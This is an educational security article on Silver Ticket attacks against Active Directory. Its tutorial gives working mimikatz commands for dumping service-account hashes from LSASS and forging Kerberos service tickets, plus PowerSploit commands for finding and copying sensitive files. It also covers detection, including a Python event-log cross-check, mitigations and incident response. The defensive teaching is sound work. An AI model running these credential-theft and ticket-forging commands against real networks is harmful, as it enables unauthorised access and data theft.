Silver Ticket Attack

Similar in concept to a Golden Ticket, a Silver Ticket attack involves compromising credentials and abusing the design of the Kerberos protocol. However, unlike a Golden Ticket, which grants an adversary unfettered access to the domain, a Silver Ticket only enables an attacker to forge ticket-granting service (TGS) tickets for specific services. TGS tickets are encrypted with the password hash for the service; therefore, if an adversary steals the hash for a service account, they can mint TGS tickets for that service.

While the scope of a Silver Ticket attack may be smaller, it is still a powerful tool in an adversary’s kit, enabling persistent and stealthy access to resources. Since only the service account’s password hash is required, it is also significantly easier to execute than a Golden Ticket attack. Techniques like harvesting hashes from LSASS.exe and Kerberoasting are common ways adversaries obtain service account password hashes.

Threat Summary

Target: Active Directory

Tools: mimikatz, impacket, PowerSploit

ATT&CK® Tactic: Credential Access

ATT&CK Technique: T1558.002

Difficulty

Detection: Hard

Mitigation: Hard

Response: Medium

Attack Tutorial: How a Silver Ticket Attack Works

STEP 1

Compromise the credentials of a service account

To gain the ability to mint TGS tickets, an adversary must first compromise the password hash of a service account. In this example, an adversary who has compromised a file server now compromises the password hash of a service account:

      PS> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

      mimikatz(commandline) # privilege::debug
      Privilege '20' OK

      mimikatz(commandline) # sekurlsa::logonpasswords
      # ... output truncated ... #
      Authentication Id : 0 ; 29151002 (00000000:01bccf1a)
      Session : Interactive from 5
      User Name : DWM-5
      Domain : Window Manager
      Logon Server : (null)
      Logon Time : 21/07/2020 10:26:16
      SID : S-1-5-90-0-5
      msv :
      [00000003] Primary
      * Username : FileServer1$
      * Domain : DOMAIN
      * NTLM : 281fd98680ed31a9212256ada413db50
      * SHA1 : c8fe518dfa728eb92eb2566328f0123e3bcb2717
      # ... output truncated ... #

      mimikatz(commandline) # exit
      Bye!

STEP 2

Forge Kerberos TGS tickets

Tools like mimikatz can be used to mint Silver Tickets. The process for forging TGS tickets is similar to minting Golden Tickets. With mimikatz, it uses the same kerberos::golden method, but specifies the password hash of the service account instead of the krbtgt hash, along with the following parameters:

  • /domain — The fully qualified domain name of the Active Directory domain
  • /sid — The SID of the Active Directory domain
  • /user — The username to impersonate
  • /target — The fully qualified domain name of the server
  • /service — The target service name
  • /rc4 — The NTLM/RC4 password hash

      PS> .\mimikatz.exe "kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt" "misc::cmd" exit

      mimikatz(commandline) # kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt
      User : NonExistentUser
      Domain : domain.com (DOMAIN)
      SID : S-1-5-21-5840559-2756745051-1363507867
      User Id : 500
      Groups Id : *513 512 520 518 519
      ServiceKey: 8fbe632c51039f92c21bcef456b31f2b - rc4_hmac_nt
      Service : cifs
      Target : FileServer1.domain.com
      Lifetime : 27/07/2020 12:20:26 ; 25/07/2030 12:20:26 ; 25/07/2030 12:20:26
      -> Ticket : ** Pass The Ticket **
      * PAC generated
      * PAC signed
      * EncTicketPart generated
      * EncTicketPart encrypted
      * KrbCred generated

      Golden ticket for 'NonExistentUser @ domain.com' successfully submitted for current session

      mimikatz(commandline) # misc::cmd
      Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7767043B8

      mimikatz(commandline) # exit
      Bye!

STEP 3

Use the forged tickets to gain further objectives

In the previous step, the adversary forged a Silver Ticket and injected it into a new cmd.exe session. The Silver Ticket the attacker minted specified the cifs service, which will allow the attacker to use the forged TGS to access file shares. Because the TGS is forged, it can be created for a user that does not actually exist in the domain, making it harder for responders to track the adversary.

In this example, the adversary uses the forged ticket and the Find-InterestingFile cmdlet from the PowerShell module PowerSploit to scan the file share for sensitive data and exfiltrate it.

      PS> Find-InterestingFile -Path \\FileServer1.domain.com\S$\shares\

      FullName : \\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx
      Owner : DOMAIN\JOED
      LastAccessTime : 27/07/2020 12:47:44
      LastWriteTime : 27/07/2020 12:47:44
      CreationTime : 10/04/2011 10:04:50
      Length : 76859

      PS> Copy-Item -Path "\\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx" -Destination "C:\Windows\Temp\a20ds3"
      PS>

Detect, Mitigate and Respond

Detect

Difficulty: Hard

The normal process of obtaining a ticket-granting service ticket involves asking a domain controller to generate one. After the caller proves their identity, the domain controller will reply with a TGS encrypted with the service account password. But because the adversary has compromised that password, they can mint TGS tickets without communicating with the domain controller.

Thus, detecting Silver Tickets is possible only on the endpoint and involves examining TGS tickets for subtle signs of manipulation, such as:

  • Usernames that don’t exist
  • Modified (added or removed) group memberships
  • Username and ID mismatches
  • Weaker than normal encryption types or ticket lifetimes that exceed the domain maximum (the domain default lifetime is 10 hours; the mimikatz default is 10 years)

The Windows event log has several audit events that are useful for detecting Silver Tickets:

| Event | Source | Information |
|---|---|---|
| Audit Group Membership: Event ID 4627 | Member Computers | User’s security identifier (SID); group memberships |
| Audit Logon: Event ID 4624 | Member Computers | User’s security identifier (SID); username; source IP (indicating potentially compromised host) |
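
The following added example (not part of the original article or any Netwrix tooling) shows how the username, SID and group membership fields from events 4624 and 4627 can be cross-checked against a directory snapshot to surface the indicators listed above. The event records, the directory snapshot, the RID 1104, the IP addresses and the simplified field names are constructed assumptions; the domain SID and the forged user's RID and groups are taken from the tutorial output.

```python
# Added example: constructed data, not real logs.
DOMAIN_SID = "S-1-5-21-5840559-2756745051-1363507867"  # domain SID used on this page

# Assumed directory snapshot: account SID -> (sAMAccountName, group RIDs).
DIRECTORY = {
    f"{DOMAIN_SID}-500": ("Administrator", {513, 512, 520, 518, 519}),
    f"{DOMAIN_SID}-1104": ("joed", {513}),
}

# Constructed, simplified 4624/4627 records from a member server. Real 4627
# events list full group SIDs; RIDs are used here to keep the sample short.
EVENTS = [
    {"id": 4624, "user": "joed", "sid": f"{DOMAIN_SID}-1104", "ip": "10.0.0.21"},
    {"id": 4627, "user": "joed", "sid": f"{DOMAIN_SID}-1104", "groups": {513}},
    {"id": 4624, "user": "NonExistentUser", "sid": f"{DOMAIN_SID}-500", "ip": "10.0.0.57"},
    {"id": 4627, "user": "NonExistentUser", "sid": f"{DOMAIN_SID}-500",
     "groups": {513, 512, 520, 518, 519}},
    {"id": 4627, "user": "joed", "sid": f"{DOMAIN_SID}-1104", "groups": {513, 512}},
]


def silver_ticket_indicators(events, directory):
    """Return (event id, username, source IP, reasons) for each suspicious event."""
    known_names = {name.lower() for name, _ in directory.values()}
    findings = []
    for ev in events:
        reasons = []
        entry = directory.get(ev["sid"])
        if ev["user"].lower() not in known_names:
            reasons.append("username does not exist")
        if entry is None:
            reasons.append("SID does not exist")
        elif entry[0].lower() != ev["user"].lower():
            reasons.append(f"SID belongs to {entry[0]}")
        if ev["id"] == 4627 and entry is not None:
            # Compare logged groups with what the directory says for this SID.
            added = sorted(ev["groups"] - entry[1])
            removed = sorted(entry[1] - ev["groups"])
            if added:
                reasons.append(f"groups added: {added}")
            if removed:
                reasons.append(f"groups removed: {removed}")
        if reasons:
            findings.append((ev["id"], ev["user"], ev.get("ip"), reasons))
    return findings


if __name__ == "__main__":
    for finding in silver_ticket_indicators(EVENTS, DIRECTORY):
        print(finding)
```

Ticket lifetime and encryption type are not carried in these two events, so those indicators still require inspecting the tickets on the endpoint.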

Mitigate

Difficulty: Medium

Because Silver Tickets abuse the Kerberos protocol, the risk of their use cannot be entirely eliminated. However, several mitigations exist that can make it harder for an adversary to compromise service account password hashes.

  • Adopt strong password hygiene practices for service accounts: Their passwords should be randomly generated, have a minimum of 30 characters and be routinely changed.
  • Enable PAC Validation. Though it has known limitations, there are some situations in which it may assist with the detection and prevention of Silver tickets.
  • Remove end-user administrative privileges on member workstations, and adopt controlled privilege elevation solutions.
  • Reduce administrative access to member workstations and servers to the least required.
  • Use solutions like Microsoft LAPS to create strong, random and unique passwords for local administrator accounts, and automatically rotate them periodically.
  • Apply the recommended mitigations for Kerberoasting.
  • Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from the workstation to a server or domain controller.

Respond

Difficulty: Medium

If a Silver Ticket is detected, the following response actions should be taken:

  • Activate the incident response process and alert the incident response team.
  • Quarantine any implicated computers for forensic investigation and eradication and recovery activities.
  • Reset the password of the compromised service account.
